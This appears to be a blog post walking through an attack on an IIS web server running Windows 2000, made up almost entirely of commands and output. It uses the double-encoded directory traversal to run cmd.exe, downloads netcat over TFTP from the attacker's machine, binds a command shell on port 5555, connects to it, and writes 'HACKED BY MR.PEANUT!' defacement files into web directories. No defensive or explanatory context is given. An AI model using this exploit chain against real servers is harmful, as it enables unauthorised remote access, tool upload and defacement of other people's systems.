Step 1: Testing IIS Directory Traversal Exploit
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 2: Upload Netcat to the target machine
Make sure that you have started TFTPD service (Start > Services > TFTPD > Start TFTPD) and copy nc.exe from /pentest/windows_binaries/tools directory to /tmp directory.
cd /pentest/windows_binaries/tools
cp nc.exe /tmp
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe
Step 3: Verify if Netcat has been uploaded
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 4: Launch Netcat in listening mode (from the target) port 5555 (launch netcat and spwn a command shell)
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+nc+-v+-l+-p+5555+-d+-e+cmd.exe
Step 5: Connect to the open port on the remote machine
nc -v 131.107.1.101 5555
131.107.1.101: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [131.107.1.101] 5555 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 131.107.1.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Step 6: Test our priviledge level by writing a file to multiple directories.
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > hacked.txt
echo HACKED BY MR.PEANUT! > hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\hacked.txt
echo HACKED BY MR.PEANUT! > c:\hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
Access is denied.
c:\inetpub\scripts>
No comments:
Post a Comment